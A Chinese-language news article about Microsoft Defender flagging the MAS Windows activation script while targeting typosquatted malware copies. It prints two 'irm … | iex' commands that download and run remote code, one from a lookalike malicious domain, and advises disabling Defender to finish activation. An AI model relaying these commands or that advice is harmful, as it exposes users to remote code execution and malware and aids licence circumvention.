微软Defender在恶意软件大战中拦截了官方MAS脚本

信息安全 来源：securityonline 2026-01-14 04:49:18 阅读：0

微软显然已意识到微软激活脚本（MAS）这一广受欢迎的开源工具；此外，该公司似乎也清楚地了解到，有恶意行为者正在注册虚假域名，以MAS的名义传播恶意软件。因此，微软已部署 Microsoft Defender将自主拦截这些欺诈性激活工具。

遗憾的是，微软的过滤逻辑中出现了一处异常：原本真实的MAS实用工具如今却被这些防御措施误判为可疑对象。因此，用户尝试通过PowerShell执行激活命令时，会遭遇突如其来的错误。人们不禁要问，这是否是一场蓄意打压正版工具的行动；然而，Microsoft Defender中的日志记录显示将该威胁定性为。鉴于有关这些伪造脚本的报告近期才浮出水面——且已得到MAS开发团队在社交媒体上的证实——微软的意图很可能是为了遏制仿冒品，而非原版。

合法脚本与其恶意对应版本之间的区别，取决于域名中的一个字符：

真正的MAS命令位于： irm https://get.activated.win | iex

被篡改的版本省略了字母‘d’： irm hxxps://get.activate.win | iex

微软似乎无意中将合法域名列入了黑名单。尽管缺乏虚拟测试环境，无法立即验证网络钓鱼版本是否已被成功拦截，但如果安全  软件竟然放过了恶意软件，却阻止了无害的原始版本，那可真是个莫大的讽刺。

当前的困境要求，由于Microsoft Defender默认已启用，用户必须导航至安全中心，暂时禁用这些防护措施，然后再继续激活。流程完成后，应立即重新启用各项防御层。

必须特别强调，务必对域名保持高度警惕。如果在禁用安全协议的同时执行网络钓鱼脚本，系统将毫无防护地暴露于恶意软件的威胁之下，这可能导致灾难性的数据泄露或其他安全漏洞。